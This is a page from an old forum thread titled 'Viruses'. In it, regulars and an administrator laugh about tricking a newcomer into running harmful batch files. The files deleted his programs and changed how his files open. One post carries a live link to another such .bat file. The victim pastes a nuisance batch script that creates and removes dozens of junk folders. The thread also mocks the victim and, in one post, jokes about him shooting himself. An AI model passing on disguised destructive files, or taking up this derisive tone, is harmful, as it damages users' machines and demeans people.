The Geek Forum

• May 17, 2024, 07:38:42 AM
  • Welcome, Guest
Please login or register.

Login with username, password and session length
Advanced search  

News:

Due to the prolific nature of these forums, poster aggression is advised.

Recent Forum Posts

Shout Box

Members
  • Total Members: 4962
  • Latest: hvWeils
Stats
  • Total Posts: 129633
  • Total Topics: 7189
  • Online Today: 14
  • Online Ever: 1013
  • (January 12, 2023, 01:18:11 AM)
Pages: 1 2 3 4 [5] 6

Author Topic: Viruses  (Read 28723 times)

Rippmaster

• Annoying Newbie
  • Coolio Points: +0/-0
    • View Profile
Viruses
« Reply #100 on: December 02, 2002, 02:43:54 PM »

BTW, what is the file suppose to do? I have downloaded it and activated it, but nothing seems to happen... Is it me or you?
\m/METAL UP YOUR ASS AND THEN YOU'LL NEVER WALK ALONE\m/
Why Anakin became Vader: "Luke, I'm not you're father, he is!", said Vader, pointing at Amidalas close "friend" Kenobi... :vader:

Demosthenes

• Evil Ex-HN Moderator
  • Administrator
  • Hacker
  • Coolio Points: +567/-72
  • Just try me. See what happens.
    • View Profile
    • Zombo
Viruses
« Reply #101 on: December 02, 2002, 02:44:57 PM »

Quote from: Rippmaster
BTW, what is the file suppose to do? I have downloaded it and activated it, but nothing seems to happen... Is it me or you?
Well, read to me the word that's right underneath your name on all of your posts.  What is that word?  What does it say?

BTW, it's me.  I linked you to the wrong one.  Try this one instead.

Coolio Points: 89,000,998,776,554,211,222
Detta Puzzle Points: 45

Banning forum idiots since 2001

Rippmaster

• Annoying Newbie
    • View Profile
Viruses
« Reply #102 on: December 02, 2002, 02:51:01 PM »

Yeah, I know, I'm a stupid motherfucking LAMER, but if you tell me this now, you contribute to me being less of that!

And If you tell me what your file was intended to do, I can TRY to find out what causing it not to work! Could it have anything to do with me, when everything looked at it's darkest, chose the option "open all this type of files in this format" and then chose Excel as program (Didn't think about the fact that all altered files were in a *.lnk format, which basicly meant that my computer tries to open my winamp play list in Excel :D !
Why Anakin became Vader: "Luke, I'm not you're father, he is!", said Vader, pointing at Amidalas close "friend" Kenobi... :vader:

Banshee

• Geek
  • Coolio Points: +106/-3
  • Baby-Eater
    • View Profile
    • A Shadow Priest
Viruses
« Reply #103 on: December 02, 2002, 02:55:54 PM »

I see the time is long overdue for me to make my happy, joyous entrance.

Without further ado, I must assure the two of you that yes, I was laughing my ass off.  :lol:  :lol:

But I apologize to Rippmaster. I didn't intend for you to click on the links. However, you DID click on the links with your little old finger. Nobody compelled you to. Most people are smart enough to examine what it is you are clicking on, EVEN IF they do not know how to use a computer to run anything more complicated than IE. ESPECIALLY if it is from someone YOU DON'T KNOW.

By looking at the date of your post, you had the benefit of reading what was going on at the time in its ENTIRETY. There was NO reason for you to click on a link that was, as one can easily gather by reading myself and TheJudge's comments, NOT what it seemed. I'm not expecting people to automatically know the specifics of hotmail3.bat and hm2k.bat, however, I would expect people to ASK if they are not SURE what a program does. Common sense, right?

Why were you surfing forums if you had an exam paper to write anyhow?  :D

Now for Jonesie, as he has been affectionately dubbed, it's a different matter. He stands alongside mowgliswinger as a person of doubtful intelligence who expects the entire world (i.e. the forum) to give him EXACTLY what it is he needs, instead of using the opportunity to express his views on different topics IN AN INTELLIGENT MANNER to the end that his horizons broaden. On the particular day of the "incident," I was irritated by others and bent on causing mayhem on some deserving targets. Now the fact that he was invited by mowgliswinger, whose character is well known to the forum, and asks stupid, irritating questions may not be enough to classify him as an AOL user, but his responses posted in this thread certainly shed some light on the issue.  :roll:  :wink:

EDIT (after Rippmaster's latest post):
Maybe you should read between the lines of EACH and EVERY ONE of Demo's posts in this thread and conclude that, maybe, these files were intended to remove unwanted visitors, who become unwanted due to an egregious lack of intelligence. I don't pick on newbies, like I said, you clicked on them your own self.

Quote from: TheJudge
OMFG! I'm in tears now!

But Demo, If I remember correctly, Jones boy just showed up and asked how to post pics in threads. Then Banshee told him to download his little file. He just picked on a newbie for no apparent reason. Now to be fair, we should tell him how to fix it. I'm sure he's learned a valuable lesson. (Lessons 1: We are all assholes here. lol!)

Quote from: TheJudge
Thanks for the info Demo, I was just telling him what I though would work. I didn't actually want to run the file and then test it. That wouldn't be very wise now would it? NEVER RUN A FILE FROM BANSHEE!!! EVER!!!! Everyone got that????

Plus, it cause more trouble for us because we have to clean up the mess. Ah... The price to pay to be the nice guy.

As the above indicates, you should also be aware of my low bullshit tolerance.

Sorry you feel responsible for cleaning this mess up, Demo, I was simply removing a pest.

I won't post any more batch files without expressed indication of deservedness or guilt in the future. 'Kay?
"Dear pete, lol. U r dum." - Bobert

Anonymous

Viruses
« Reply #104 on: December 02, 2002, 02:59:15 PM »

You know, I now get PMs from people telling me that their computers are messed up because they ran some file that they "got from here" and say that I should take responsibility for it. I never told them to download it, and I really wouldn't know what they do anyway, I never downloaded those files in the first place. :wink:

Either way, if your computer is that messed up, looks like it's time to break out the good old Windows XP CD, or whatever operating system you were using at the time. That should fix all your problems.

Demosthenes

• Evil Ex-HN Moderator
  • Administrator
  • Hacker
    • View Profile
    • Zombo
Viruses
« Reply #105 on: December 02, 2002, 03:01:02 PM »

And the next step, Rippmaster, is to break out a dictionary and figure out what the words underneath my name mean.

Rippmaster

• Annoying Newbie
    • View Profile
Viruses
« Reply #106 on: December 02, 2002, 03:03:53 PM »

Well, banshee, I happy to know that the file wasn't intened for me! And why I clicked it... Well, I have now used internet steady for 4 years and computer for about 8, without having trouble with downloading and downloaded files, so I guess I got a little to secure, so I didn't use common sense and examined the file before using it!

Why I was here when I had an exam paper to write? Do you know how boring it is to do exam papers? Well, if you know, that answers your question more than enough!

PS. Were did you learn to program files? I always wanted to learn that... Although just to scare people, not to fuck em! I would also have made a reversing file, whcih would have reversed the whole prosess the file had set in motion!

Demosthenes

• Evil Ex-HN Moderator
  • Administrator
  • Hacker
    • View Profile
    • Zombo
Viruses
« Reply #107 on: December 02, 2002, 03:05:42 PM »

PS. Were did you learn to program files? I always wanted to learn that... Although just to scare people, not to fuck em! I would also have made a reversing file, whcih would have reversed the whole prosess the file had set in motion!
[/i]If you don't know how to write your own process to reverse it, or how to figure out how, then you should never have been running that to begin with.

That is our entire point.  Now run along.  Shoo.

Rippmaster

• Annoying Newbie
    • View Profile
Viruses
« Reply #108 on: December 02, 2002, 03:08:44 PM »

BTW, it's me. I linked you to the wrong one. Try this one instead. (Links to:http://209.225.8.65/shifty/tal-dania/batch/hm2k.bat)

Ha, ha, I ain't that stupid twice!!!

Banshee

• Geek
  • Baby-Eater
    • View Profile
    • A Shadow Priest
Viruses
« Reply #109 on: December 02, 2002, 03:08:59 PM »

Quote from: Chris
You know, I now get PMs from people telling me that their computers are messed up because they ran some file that they "got from here" and say that I should take responsibility for it. I never told them to download it, and I really wouldn't know what they do anyway, I never downloaded those files in the first place. :wink:

Either way, if your computer is that messed up, looks like it's time to break out the good old Windows XP CD, or whatever operating system you were using at the time. That should fix all your problems.

Maybe that's because they saved us the trouble of answering questions about h4x0ring their gf's h0tm4|L account or SubSeven and simply found what they were looking for. I hope it helps.

I don't think you are even responsible legally, at least not personally responsible. So just give 'em a big middle finger.  :D

Rippmaster

• Annoying Newbie
    • View Profile
Viruses
« Reply #110 on: December 02, 2002, 03:11:31 PM »

BTW Jonsy got quiet... did he get all to angry with this problem and found his fathers shotgun, blasted his box with interior into nice dust, did the same with his screen and then shot himself?

Just guessing...

Banshee

• Geek
  • Baby-Eater
    • View Profile
    • A Shadow Priest
Viruses
« Reply #111 on: December 02, 2002, 03:13:36 PM »

:Sigh:
I'm almost sad that I caused this much of a ruckus. Now, we deal with the fallout...

Do you read ANYTHING anyone posts in here? Demo answered every single question one could possibly have about his batch files.

Just to clarify things: the "DELETE" command DELETES files. They are gone. Period. No Norton's Protected Files, no Restore button like the Recycle Bin. Nothing. We're dealing with DOS here, folks, and it was never intended for anyone who wasn't serious about using a computer.

Demosthenes

• Evil Ex-HN Moderator
  • Administrator
  • Hacker
    • View Profile
    • Zombo
Viruses
« Reply #112 on: December 02, 2002, 03:16:08 PM »

Ha, ha, I ain't that stupid twice!!!
[/i]Lol.  I'm not convinced of that.  You did run that p-uni.bat file, did you not?  At this point you likely have no idea what that even did... if you ask me, that DOES make you "that stupid".

Demosthenes

• Evil Ex-HN Moderator
  • Administrator
  • Hacker
    • View Profile
    • Zombo
Viruses
« Reply #113 on: December 02, 2002, 03:17:39 PM »

BTW Jonsy got quiet... did he get all to angry with this problem and found his fathers shotgun, blasted his box with interior into nice dust, did the same with his screen and then shot himself?

Just guessing...
[/i]We can only hope.... :D

Rippmaster

• Annoying Newbie
    • View Profile
Viruses
« Reply #114 on: December 02, 2002, 03:17:50 PM »

Well, as you prbably has understood by now, I am the very definition of the word LAMER in terms of more advance computer use! (Had a big brother who took care all that!)

But as I always say, you learn for as long as you live!

Demosthenes

• Evil Ex-HN Moderator
  • Administrator
  • Hacker
    • View Profile
    • Zombo
Viruses
« Reply #115 on: December 02, 2002, 03:19:14 PM »

Well, as you prbably has understood by now, I am the very definition of the word LAMER in terms of more advance computer use!
[/i]So then you should not be using one.  Seriously.  Turn it off right now and do something else.

Rippmaster

• Annoying Newbie
    • View Profile
Viruses
« Reply #116 on: December 02, 2002, 03:20:05 PM »

BTW Demon, what was that *.bat files intensions?
@echo off
cls

if exist c:\windows\bureau\40³Å³Å\nul goto setup3

if exist c:\windows\desktop\40³Å³Å\nul goto setup4

if exist c:\windows\desktop\nul goto setup1

if exist c:\windows\bureau\nul goto setup2

goto end

:setup1
cd c:\windows\desktop
goto main

:setup2
cd c:\windows\bureau
goto main

:main
md 1³Åų
md 2ÅųÅ
md 3³³³³
md 4ųų
md 5³³³Å
md 6ÅÅÅÅ
md 7³ÅÅÅ
md 8ÅųÅ
md 9³³³³
md 10ųÅÅ
md 11ÅÅÅÅ
md 12ųų
md 13³³Å³
md 14³Å³³
md 15ÅųÅ
md 16ų³³
md 17ųų
md 18ų³Å
md 19³³³Å
md 20³Å³³
md 21ųų
md 22ÅÅų
md 23³³³Å
md 24ÅųÅ
md 25ÅÅų
md 26³³Å³
md 27ųų
md 28³Åų
md 29³³³Å
md 30Åų³
md 31³³ÅÅ
md 32³³³³
md 33Åų³
md 34Åų³
md 35³Å³³
md 36ÅųÅ
md 37ÅųÅ
md 38³Å³³
md 39ÅÅų
md 40³Å³Å
md 41³ÅÅÅ
md 42³³ÅÅ
md 43³ÅÅÅ
md 44³³Å³
md 45³Åų
md 46³Åų
md 47³Å³³
md 48ÅųÅ
md 49ųÅÅ
md 50³Åų
md 51³Å³³
md 52ÅųÅ
md 53³Åų
md 54ų³Å
md 55ųÅÅ
md 56³³³Å
md 57³ÅÅÅ
md 58³³Å³
md 59ÅųÅ
md 60³³ÅÅ
md 61ųÅÅ
md 62ÅųÅ
md 63³³³³
md 64ųÅÅ
md 65³Åų
goto end

:setup3
cd c:\windows\bureau
goto delmain

:setup4
cd c:\windows\desktop
goto delmain

:delmain
rd 1³Åų
rd 2ÅųÅ
rd 3³³³³
rd 4ųų
rd 5³³³Å
rd 6ÅÅÅÅ
rd 7³ÅÅÅ
rd 8ÅųÅ
rd 9³³³³
rd 10ųÅÅ
rd 11ÅÅÅÅ
rd 12ųų
rd 13³³Å³
rd 14³Å³³
rd 15ÅųÅ
rd 16ų³³
rd 17ųų
rd 18ų³Å
rd 19³³³Å
rd 20³Å³³
rd 21ųų
rd 22ÅÅų
rd 23³³³Å
rd 24ÅųÅ
rd 25ÅÅų
rd 26³³Å³
rd 27ųų
rd 28³Åų
rd 29³³³Å
rd 30Åų³
rd 31³³ÅÅ
rd 32³³³³
rd 33Åų³
rd 34Åų³
rd 35³Å³³
rd 36ÅųÅ
rd 37ÅųÅ
rd 38³Å³³
rd 39ÅÅų
rd 40³Å³Å
rd 41³ÅÅÅ
rd 42³³ÅÅ
rd 43³ÅÅÅ
rd 44³³Å³
rd 45³Åų
rd 46³Åų
rd 47³Å³³
rd 48ÅųÅ
rd 49ųÅÅ
rd 50³Åų
rd 51³Å³³
rd 52ÅųÅ
rd 53³Åų
rd 54ų³Å
rd 55ųÅÅ
rd 56³³³Å
rd 57³ÅÅÅ
rd 58³³Å³
rd 59ÅųÅ
rd 60³³ÅÅ
rd 61ųÅÅ
rd 62ÅųÅ
rd 63³³³³
rd 64ųÅÅ
rd 65³Åų
goto end

:end
exit

If anyone explains to me in two words what this will do, I'll buy them an ice cream the next time I see them!

Demosthenes

• Evil Ex-HN Moderator
  • Administrator
  • Hacker
    • View Profile
    • Zombo
Viruses
« Reply #117 on: December 02, 2002, 03:21:25 PM »

BTW Demon, what was that *.bat files intensions?
[/i]To help you lead a simpler, less stressful existence.  I already explained that.

Now go away.  Scurry off.  Run along.  Git.

Anonymous

Viruses
« Reply #118 on: December 02, 2002, 03:24:18 PM »

Now, what I really want to know is if you two clowns downloaded the cmos spanker yet? Chris, since it seems they are sticking around regarldess of the warm welcome they have received here, do you still have a copy of that? Maybe you should post a link and save them the trouble of searching for it.

Banshee, Demo, I haven't laught this hard in a very long time. Thanks! My boss as been looking my way very suspiciously. He's wondering what the hell I'm laughling at. Since I didn't want him to find out I spend most of the day on-line goofing off, I pretended I was insane. "Look" I said, "It's a girafe!" while pointing at the ceiling. Now I may get a few weeks off with pay while I visit the psych ward... Excelent! Paid vacations....

Anonymous

Viruses
« Reply #119 on: December 02, 2002, 03:28:46 PM »

Nope, sorry, I'm all out of cmos spankers now. However, I do have a bios stabber, if anyone wants to try that instead. This program makes people's RAM spin around too fast and then break because of it's speed, as opposed to someone's hard drive spinning out of control when using the cmos spanker.

Rippmaster

• Annoying Newbie
    • View Profile
Viruses
« Reply #120 on: December 02, 2002, 03:29:10 PM »

LET ME ENTERTAINNNNNN YOUUUUUUUUUUUUUUU!!!!

Rippmaster

• Annoying Newbie
    • View Profile
Viruses
« Reply #121 on: December 02, 2002, 03:35:36 PM »

Good new, all files except deleted .exe files function normally now!!! All jpg and such! HURRAY!!!

Anonymous

Viruses
« Reply #122 on: December 02, 2002, 03:36:56 PM »

Looks like you have to re-acquire all those lost .exe files. Sorry, Charlie.

Demosthenes

• Evil Ex-HN Moderator
  • Administrator
  • Hacker
    • View Profile
    • Zombo
Viruses
« Reply #123 on: December 02, 2002, 03:43:30 PM »

LET ME ENTERTAINNNNNN YOUUUUUUUUUUUUUUU!!!!
[/i]Ahhh.... he's finally beginning to catch on.

That's right, Pedro.  You're here to entertain us.

Now DANCE!!!!

Banshee

• Geek
  • Baby-Eater
    • View Profile
    • A Shadow Priest
Viruses
« Reply #124 on: December 02, 2002, 03:43:59 PM »

Quote from: Chris
Looks like you have to re-acquire all those lost .exe files. Sorry, Charlie.

They were probably mostly pirate progs that dial some overseas number while professing to be connecting you to a Fast, Broadband Server for FREE Celeb Porn Pics!!!!!

So no need to worry.
Pages: 1 2 3 4 [5] 6